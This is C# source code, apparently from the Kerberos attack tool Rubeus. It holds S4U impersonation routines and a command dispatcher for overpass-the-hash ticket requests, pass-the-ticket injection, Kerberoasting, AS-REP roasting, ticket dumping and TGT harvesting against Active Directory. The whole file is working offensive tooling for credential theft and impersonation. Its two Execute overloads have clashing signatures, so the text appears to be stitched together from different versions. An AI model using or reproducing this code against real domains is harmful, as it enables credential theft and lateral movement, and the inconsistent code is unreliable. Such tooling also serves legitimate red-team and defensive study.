public static void Execute(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string targetUser, string targetSPN, bool ptt, string domainController = "", string altService = "") { // first retrieve a TGT for the user byte[] kirbiBytes = Ask.TGT(userName, domain, keyString, etype, false); Console.WriteLine(); if (kirbiBytes == null) { Console.WriteLine("[X] Error retrieving a TGT with the supplied parameters"); return; } // transform the TGT bytes into a .kirbi file KRB_CRED kirbi = new KRB_CRED(kirbiBytes); // execute the s4u process Execute(kirbi, targetUser, targetSPN, ptt, domainController, altService); }
public static void Execute(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null, string targetDomainController = "", string targetDomain = "", bool self = false, bool opsec = false, bool bronzebit = false, bool pac = true, string proxyUrl = null, string createnetonly = null, bool show = false) { // first retrieve a TGT for the user byte[] kirbiBytes = Ask.TGT(userName, domain, keyString, etype, null, false, domainController, new LUID(), false, opsec, "", false, pac, proxyUrl); if (kirbiBytes == null) { Console.WriteLine("[X] Error retrieving a TGT with the supplied parameters"); return; } else { Console.WriteLine("\r\n"); } // transform the TGT bytes into a .kirbi file KRB_CRED kirbi = new KRB_CRED(kirbiBytes); // execute the s4u process Execute(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, tgs, targetDomainController, targetDomain, self, opsec, bronzebit, keyString, etype, null, null, proxyUrl, createnetonly, show); }
static void Main(string[] args) { Logo(); var arguments = new Dictionary <string, string>(); foreach (string argument in args) { int idx = argument.IndexOf(':'); if (idx > 0) { arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); } else { arguments[argument] = ""; } } if (arguments.ContainsKey("asktgt")) { string user = ""; string domain = ""; string hash = ""; string dc = ""; bool ptt = false; uint luid = 0; Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial; if (arguments.ContainsKey("/user")) { user = arguments["/user"]; } if (arguments.ContainsKey("/domain")) { domain = arguments["/domain"]; } if (arguments.ContainsKey("/dc")) { dc = arguments["/dc"]; } if (arguments.ContainsKey("/rc4")) { hash = arguments["/rc4"]; encType = Interop.KERB_ETYPE.rc4_hmac; } if (arguments.ContainsKey("/aes256")) { hash = arguments["/aes256"]; encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1; } if (arguments.ContainsKey("/ptt")) { ptt = true; } if (arguments.ContainsKey("/luid")) { try { luid = UInt32.Parse(arguments["/luid"]); } catch { try { luid = Convert.ToUInt32(arguments["/luid"], 16); } catch { Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]); return; } } } if (arguments.ContainsKey("/createnetonly")) { // if we're starting a hidden process to apply the ticket to if (!Helpers.IsHighIntegrity()) { Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session"); return; } if (arguments.ContainsKey("/show")) { luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], true); } else { luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], false); } Console.WriteLine(); } if (String.IsNullOrEmpty(user)) { Console.WriteLine("\r\n[X] You must supply a user name!\r\n"); return; } if (String.IsNullOrEmpty(domain)) { domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; } if (String.IsNullOrEmpty(hash)) { Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n"); return; } if (!((encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1))) { Console.WriteLine("\r\n[X] Only /rc4 and /aes256 are supported at this time.\r\n"); return; } else { Ask.TGT(user, domain, hash, encType, ptt, dc, luid); return; } } if (arguments.ContainsKey("renew")) { bool ptt = false; string dc = ""; if (arguments.ContainsKey("/ptt")) { ptt = true; } if (arguments.ContainsKey("/dc")) { dc = arguments["/dc"]; } if (arguments.ContainsKey("/ticket")) { string kirbi64 = arguments["/ticket"]; if (Helpers.IsBase64String(kirbi64)) { byte[] kirbiBytes = Convert.FromBase64String(kirbi64); KRB_CRED kirbi = new KRB_CRED(kirbiBytes); if (arguments.ContainsKey("/autorenew")) { // if we want to auto-renew the TGT up until the renewal limit Renew.TGTAutoRenew(kirbi, dc); } else { // otherwise a single renew operation byte[] blah = Renew.TGT(kirbi, ptt, dc); } } else if (File.Exists(kirbi64)) { byte[] kirbiBytes = File.ReadAllBytes(kirbi64); KRB_CRED kirbi = new KRB_CRED(kirbiBytes); if (arguments.ContainsKey("/autorenew")) { // if we want to auto-renew the TGT up until the renewal limit Renew.TGTAutoRenew(kirbi, dc); } else { // otherwise a single renew operation byte[] blah = Renew.TGT(kirbi, ptt, dc); } } else { Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n"); } return; } else { Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied for renewal!\r\n"); return; } } if (arguments.ContainsKey("s4u")) { string targetUser = ""; string targetSPN = ""; string altSname = ""; string user = ""; string domain = ""; string hash = ""; bool ptt = false; string dc = ""; Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial; if (arguments.ContainsKey("/user")) { user = arguments["/user"]; } if (arguments.ContainsKey("/domain")) { domain = arguments["/domain"]; } if (arguments.ContainsKey("/ptt")) { ptt = true; } if (arguments.ContainsKey("/dc")) { dc = arguments["/dc"]; } if (arguments.ContainsKey("/rc4")) { hash = arguments["/rc4"]; encType = Interop.KERB_ETYPE.rc4_hmac; } if (arguments.ContainsKey("/aes256")) { hash = arguments["/aes256"]; encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1; } if (arguments.ContainsKey("/impersonateuser")) { targetUser = arguments["/impersonateuser"]; } if (arguments.ContainsKey("/msdsspn")) { targetSPN = arguments["/msdsspn"]; } if (arguments.ContainsKey("/altservice")) { altSname = arguments["/altservice"]; } if (String.IsNullOrEmpty(targetUser)) { Console.WriteLine("\r\n[X] You must supply a /impersonateuser to impersonate!\r\n"); return; } if (String.IsNullOrEmpty(targetSPN)) { Console.WriteLine("\r\n[X] You must supply a /msdsspn !\r\n"); return; } if (arguments.ContainsKey("/ticket")) { string kirbi64 = arguments["/ticket"]; if (Helpers.IsBase64String(kirbi64)) { byte[] kirbiBytes = Convert.FromBase64String(kirbi64); KRB_CRED kirbi = new KRB_CRED(kirbiBytes); S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname); } else if (File.Exists(kirbi64)) { byte[] kirbiBytes = File.ReadAllBytes(kirbi64); KRB_CRED kirbi = new KRB_CRED(kirbiBytes); S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname); } else { Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n"); } return; } else if (arguments.ContainsKey("/user")) { // if the user is supplying a user and rc4/aes256 hash to first execute a TGT request user = arguments["/user"]; if (String.IsNullOrEmpty(hash)) { Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n"); return; } S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, ptt, dc, altSname); return; } else { Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied for S4U!"); Console.WriteLine("[X] Alternatively, supply a /user and </rc4:X | /aes256:X> hash to first retrieve a TGT.\r\n"); return; } } if (arguments.ContainsKey("ptt")) { uint luid = 0; if (arguments.ContainsKey("/luid")) { try { luid = UInt32.Parse(arguments["/luid"]); } catch { try { luid = Convert.ToUInt32(arguments["/luid"], 16); } catch { Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]); return; } } } if (arguments.ContainsKey("/ticket")) { string kirbi64 = arguments["/ticket"]; if (Helpers.IsBase64String(kirbi64)) { byte[] kirbiBytes = Convert.FromBase64String(kirbi64); LSA.ImportTicket(kirbiBytes, luid); } else if (File.Exists(kirbi64)) { byte[] kirbiBytes = File.ReadAllBytes(kirbi64); LSA.ImportTicket(kirbiBytes, luid); } else { Console.WriteLine("\r\n[X]/ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n"); } return; } else { Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied!\r\n"); return; } } if (arguments.ContainsKey("purge")) { uint luid = 0; if (arguments.ContainsKey("/luid")) { try { luid = UInt32.Parse(arguments["/luid"]); } catch { try { luid = Convert.ToUInt32(arguments["/luid"], 16); } catch { Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]); return; } } } LSA.Purge(luid); } else if (arguments.ContainsKey("kerberoast")) { string spn = ""; string user = ""; string OU = ""; if (arguments.ContainsKey("/spn")) { spn = arguments["/spn"]; } if (arguments.ContainsKey("/user")) { user = arguments["/user"]; } if (arguments.ContainsKey("/ou")) { OU = arguments["/ou"]; } if (arguments.ContainsKey("/creduser")) { if (!Regex.IsMatch(arguments["/creduser"], ".+\\.+", RegexOptions.IgnoreCase)) { Console.WriteLine("\r\n[X] /creduser specification must be in fqdn format (domain.com\\user)\r\n"); return; } string[] parts = arguments["/creduser"].Split('\\'); string domainName = parts[0]; string userName = parts[1]; if (!arguments.ContainsKey("/credpassword")) { Console.WriteLine("\r\n[X] /credpassword is required when specifying /creduser\r\n"); return; } string password = arguments["/credpassword"]; System.Net.NetworkCredential cred = new System.Net.NetworkCredential(userName, password, domainName); Roast.Kerberoast(spn, user, OU, cred); } else { Roast.Kerberoast(spn, user, OU); } } else if (arguments.ContainsKey("asreproast")) { string user = ""; string domain = ""; string dc = ""; if (arguments.ContainsKey("/user")) { user = arguments["/user"]; } if (arguments.ContainsKey("/domain")) { domain = arguments["/domain"]; } if (arguments.ContainsKey("/dc")) { dc = arguments["/dc"]; } if (String.IsNullOrEmpty(user)) { Console.WriteLine("\r\n[X] You must supply a user name!\r\n"); return; } if (String.IsNullOrEmpty(domain)) { domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName; } if (String.IsNullOrEmpty(dc)) { Roast.ASRepRoast(user, domain); } else { Roast.ASRepRoast(user, domain, dc); } } else if (arguments.ContainsKey("dump")) { if (arguments.ContainsKey("/luid")) { string service = ""; if (arguments.ContainsKey("/service")) { service = arguments["/service"]; } UInt32 luid = 0; try { luid = UInt32.Parse(arguments["/luid"]); } catch { try { luid = Convert.ToUInt32(arguments["/luid"], 16); } catch { Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]); return; } } LSA.ListKerberosTicketData(luid, service); } else if (arguments.ContainsKey("/service")) { LSA.ListKerberosTicketData(0, arguments["/service"]); } else { LSA.ListKerberosTicketData(); } } else if (arguments.ContainsKey("monitor")) { string targetUser = ""; int interval = 60; if (arguments.ContainsKey("/filteruser")) { targetUser = arguments["/filteruser"]; } if (arguments.ContainsKey("/interval")) { interval = Int32.Parse(arguments["/interval"]); } Harvest.Monitor4624(interval, targetUser); } else if (arguments.ContainsKey("harvest")) { int intervalMinutes = 60; if (arguments.ContainsKey("/interval")) { intervalMinutes = Int32.Parse(arguments["/interval"]); } Harvest.HarvestTGTs(intervalMinutes); } else if (arguments.ContainsKey("describe")) { if (arguments.ContainsKey("/ticket")) { string kirbi64 = arguments["/ticket"]; if (Helpers.IsBase64String(kirbi64)) { byte[] kirbiBytes = Convert.FromBase64String(kirbi64); KRB_CRED kirbi = new KRB_CRED(kirbiBytes); LSA.DisplayTicket(kirbi); } else if (File.Exists(kirbi64)) { byte[] kirbiBytes = File.ReadAllBytes(kirbi64); KRB_CRED kirbi = new KRB_CRED(kirbiBytes); LSA.DisplayTicket(kirbi); } else { Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n"); } return; } else { Console.WriteLine("\r\n[X] A base64 .kirbi /ticket file needs to be supplied!\r\n"); return; } } else if (arguments.ContainsKey("createnetonly")) { if (arguments.ContainsKey("/program")) { if (arguments.ContainsKey("/show")) { LSA.CreateProcessNetOnly(arguments["/program"], true); } else { LSA.CreateProcessNetOnly(arguments["/program"]); } } else { Console.WriteLine("\r\n[X] A /program needs to be supplied!\r\n"); } } else { Usage(); } }